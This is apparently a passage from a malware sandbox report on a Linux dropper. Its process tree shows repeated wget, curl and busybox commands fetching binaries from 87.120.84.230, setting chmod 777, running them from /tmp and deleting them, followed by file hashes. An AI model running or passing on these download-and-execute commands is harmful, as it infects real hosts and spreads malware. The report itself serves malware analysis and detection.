/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:938
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:944
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:950
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:956
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:962
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:968
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:974
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97